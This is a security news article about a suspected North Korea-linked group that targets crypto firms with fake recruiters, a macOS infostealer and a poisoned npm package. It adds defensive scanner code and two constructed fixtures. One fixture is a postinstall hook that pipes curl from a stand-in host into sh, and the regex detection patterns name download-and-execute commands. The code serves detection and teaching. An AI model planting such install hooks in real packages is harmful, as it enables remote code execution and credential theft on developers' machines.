A new threat actor is raiding crypto firms through fake LinkedIn recruiters and poisoned CI/CD pipelines

A previously unknown threat actor has been systematically targeting cryptocurrency organizations since at least mid-2025, planting custom macOS malware through fake LinkedIn recruiter profiles and using it to move laterally into CI/CD pipelines, steal crypto wallet credentials, and in at least one case execute a supply chain attack. Google-owned cloud security firm Wiz Research disclosed the campaign today, tracking the group under the name JINX-0164.
The attack chain starts with a credible-looking LinkedIn profile posing as a recruiter. The target is invited to a virtual interview via what appears to be a legitimate teleconferencing link — but the domain is fake, designed to mimic real meeting software. When the call "fails to load," the victim is instructed to download a fix. That fix is AUDIOFIX, a Python-based infostealer and remote access trojan that disguises itself as a macOS system audio driver named coreaudiod and is saved to disk as ChromeUpdater.
What AUDIOFIX takes
Once installed, AUDIOFIX harvests an unusually broad set of credentials: passwords stored in password managers, web browser credential stores, iCloud Keychain files, local admin credentials, SSH keys and configuration files, shell history, cryptocurrency wallet addresses and browser extension data, and active session tokens from Discord, Slack, and Telegram. The malware supports manual reconnaissance, arbitrary shell command execution, file deletion, and payload retrieval from attacker-controlled infrastructure — giving JINX-0164 persistent remote access alongside the initial credential theft.
Wiz notes the payload is architecture-aware, compiled for both Intel and Apple Silicon Macs, and is delivered via a fake driver store domain (apple.driver-store[.]com) using a bash script that handles the installation.
CI/CD as a second-stage target
The distinguishing feature of JINX-0164 compared to simpler crypto-targeting malware is its focus on lateral movement into development infrastructure. After compromising an employee's laptop, the group uses AUDIOFIX to pivot to internal code distribution systems, injecting the malware payload into source code repositories. The goal is to reach other developers' machines and, ultimately, compromise the code that handles cryptocurrency transactions — turning a single phishing victim into a supply chain attack affecting all users of a project.
In a separate vector, the group has also distributed MiniRAT, a Go-based backdoor, through a compromised version of @velora-dex/sdk, a legitimate DeFi npm package used for token swaps on the VeloraDEX decentralized exchange. The poisoned package fetched a shell script from a remote server; that script dropped the macOS binary and registered it with launchctl so it would survive reboots. SafeDep and StepSecurity documented that specific campaign last month.
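The npm vector works because `npm install` runs a package's lifecycle hooks automatically. A cheap pre-install check is to scan the manifest for install-time scripts that pull code off the network and execute it. The scanner below is an added example written for this article, not code from the article, from Wiz, or from the SafeDep/StepSecurity write-ups; the two manifests it runs on are constructed and do not reproduce the real poisoned @velora-dex/sdk release.

```python
"""Flag npm manifests whose install-time lifecycle scripts fetch and run remote code.

Added example. The manifests below are constructed for illustration; the URL
example.invalid is a reserved non-resolving name, not the attacker's server.
"""
import json
import re

# npm runs these hooks during `npm install` with no further user interaction.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Downloader piped into a shell, a shell fed the output of a downloader,
# or an inline node one-liner that references a URL.
REMOTE_EXEC = re.compile(
    r"(curl|wget)\b[^|;&]*\|\s*(ba|z)?sh\b"      # curl ... | sh
    r"|\bsh\s+-c\s+[\"']?\$\((curl|wget)"          # sh -c "$(curl ...)"
    r"|\bnode\s+-e\s+.*https?://",                  # node -e "...http://..."
    re.IGNORECASE,
)


def suspicious_hooks(manifest: str) -> list[tuple[str, str]]:
    """Return (hook, command) pairs for install hooks that execute remote content."""
    pkg = json.loads(manifest)
    scripts = pkg.get("scripts") or {}
    hits = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if cmd and REMOTE_EXEC.search(cmd):
            hits.append((hook, cmd))
    return hits


# Constructed manifests. CLEAN has an ordinary local postinstall step.
CLEAN = json.dumps({
    "name": "example-sdk",
    "version": "1.0.0",
    "scripts": {"build": "tsc", "postinstall": "node scripts/patch-types.js"},
})

# POISONED models the pattern the article describes: an install hook that
# downloads a shell script and runs it.
POISONED = json.dumps({
    "name": "example-sdk",
    "version": "1.0.1",
    "scripts": {
        "build": "tsc",
        "postinstall": "curl -fsSL https://example.invalid/setup.sh | sh",
    },
})


if __name__ == "__main__":
    for label, manifest in (("clean", CLEAN), ("poisoned", POISONED)):
        print(label, suspicious_hooks(manifest))
```

The regex is a heuristic, not a guarantee: a hook that reads `node install.js` and hides the download inside that file passes this check. Pair it with `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) in CI, and pin exact versions plus a lockfile so a new release of an existing dependency cannot reach the build without a reviewed diff.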
North Korean fingerprints
Wiz researchers note that several aspects of the campaign overlap with known North Korean threat clusters, particularly BlueNoroff. These include the use of Astrill VPN during operations, a consistent focus on cryptocurrency firms and developers, and the recruitment-lure social engineering technique that has become a signature of DPRK-linked groups in recent years. Wiz stops short of a definitive attribution but assesses the activity as financially motivated and operationally sophisticated enough to sustain multi-stage intrusions.
The pattern is consistent with a broader North Korean strategy of targeting crypto infrastructure. Where ransomware groups monetize an intrusion by demanding payment afterwards, JINX-0164 goes after the funds themselves: either by stealing wallet credentials directly, or by inserting malicious code into the applications that handle crypto transactions so that the theft happens inside the victim's own software.
What crypto and developer teams should watch for
Wiz's disclosure includes indicators of compromise. Organizations should treat unsolicited LinkedIn recruiter outreach followed by video call requests, particularly those involving unexplained technical errors that require a download, as high-risk interactions. AUDIOFIX uses launchctl persistence, so macOS security tooling that monitors LaunchAgent and LaunchDaemon registration can detect it; a job labelled like an Apple component but executing from a user-writable path is the tell. The fake domain pattern (apple.driver-store[.]com and similar) should be added to DNS blocklists.
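Two of those checks can be scripted. The audit below is an added example written for this article, not Wiz's detection logic or the group's tooling. It flags launchd jobs whose label claims to be Apple's while the executable lives outside Apple's binary paths, jobs that persist from user-writable locations, and hostnames that use `apple` as a subdomain of a domain Apple does not own. The two property lists are constructed: the genuine one is modelled on the real `coreaudiod` daemon at `/usr/sbin/coreaudiod`; the fake one assumes a label and install path for the ChromeUpdater binary that the article does not state.

```python
"""Audit launchd jobs and hostnames for the impersonation patterns described above.

Added example. Plists are constructed dicts; in production feed audit_job() the
output of plistlib.load() on each file under the LaunchAgents/LaunchDaemons dirs.
"""
import os
import plistlib

# Locations from which a genuine com.apple.* job may legitimately execute.
APPLE_BINARY_ROOTS = ("/System/", "/usr/sbin/", "/usr/libexec/", "/Library/Apple/")
# Paths an unprivileged user can write to.
USER_WRITABLE = ("/Users/", "/tmp/", "/private/tmp/", "/var/folders/")
# Names tied to this campaign in the article: the on-disk name and the mimicked daemon.
KNOWN_NAMES = {"ChromeUpdater", "coreaudiod"}
LAUNCH_DIRS = (
    os.path.expanduser("~/Library/LaunchAgents"),
    "/Library/LaunchAgents",
    "/Library/LaunchDaemons",
)


def program_path(job: dict) -> str:
    """launchd accepts either Program or ProgramArguments[0] as the executable."""
    if job.get("Program"):
        return job["Program"]
    args = job.get("ProgramArguments") or [""]
    return args[0]


def audit_job(job: dict) -> list[str]:
    """Return human-readable findings for one launchd job dictionary."""
    label = job.get("Label", "")
    path = program_path(job)
    name = path.rsplit("/", 1)[-1]
    apple_path = path.startswith(APPLE_BINARY_ROOTS)
    findings = []
    if label.startswith("com.apple.") and not apple_path:
        findings.append(f"Apple label {label!r} but program outside Apple paths: {path}")
    if path.startswith(USER_WRITABLE):
        findings.append(f"persistence from user-writable location: {path}")
    if name in KNOWN_NAMES and not apple_path:
        findings.append(f"binary name {name!r} matches campaign naming outside system paths")
    if not apple_path and job.get("RunAtLoad") and job.get("KeepAlive"):
        findings.append("RunAtLoad+KeepAlive: relaunched at login and after being killed")
    return findings


def audit_dirs(dirs=LAUNCH_DIRS) -> dict[str, list[str]]:
    """Walk the launchd directories that exist on this host and audit each plist."""
    report = {}
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for fname in sorted(os.listdir(d)):
            if not fname.endswith(".plist"):
                continue
            full = os.path.join(d, fname)
            try:
                with open(full, "rb") as fh:
                    findings = audit_job(plistlib.load(fh))
            except (plistlib.InvalidFileException, OSError) as exc:
                findings = [f"unreadable plist: {exc}"]
            if findings:
                report[full] = findings
    return report


def is_apple_lookalike(host: str) -> bool:
    """True when 'apple' is a subdomain label under a registrable domain other than apple.com.

    The registrable domain is approximated as the last two labels; multi-part
    public suffixes such as co.uk need a real suffix list in production.
    """
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 3:
        return False
    return "apple" in labels[:-2] and ".".join(labels[-2:]) != "apple.com"


# Constructed: shaped like the real system daemon's job.
GENUINE_JOB = {
    "Label": "com.apple.audio.coreaudiod",
    "Program": "/usr/sbin/coreaudiod",
    "KeepAlive": True,
}

# Constructed: an Apple-looking label pointing at a user-writable binary
# named as the article describes. Label and path are assumptions.
FAKE_JOB = {
    "Label": "com.apple.audio.coreaudiod",
    "ProgramArguments": ["/Users/dev/Library/Application Support/ChromeUpdater"],
    "RunAtLoad": True,
    "KeepAlive": True,
}

if __name__ == "__main__":
    print(audit_job(FAKE_JOB))
    print(audit_dirs())
```

Run it from the affected user's account so `~/Library/LaunchAgents` resolves correctly; daemons under `/Library/LaunchDaemons` are readable without root. Anything the script reports for a `com.apple.*` label is worth pulling the binary and its plist for triage, since Apple's own jobs ship under `/System/Library`, which is read-only, and never appear in a user's LaunchAgents directory.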
For development teams, the CI/CD angle is the more serious concern. If any developer with access to build pipelines is compromised, the downstream blast radius extends to every user of the affected software. Note what AUDIOFIX steals: SSH keys, shell history and live session tokens. An attacker holding those does not need to break into the pipeline; they log in as the developer. Code signing and reproducible builds are partial mitigations (they catch tampering with the build, not a malicious commit pushed with valid credentials), so they need to be paired with signed commits, protected branches with mandatory review, short-lived CI credentials, and immediate rotation of keys and tokens after any suspected compromise. Runtime behavioral monitoring of CI/CD jobs is the most effective way to catch post-compromise lateral movement before a poisoned release ships.
Originally reported by The Hacker News. Read the original article for additional details.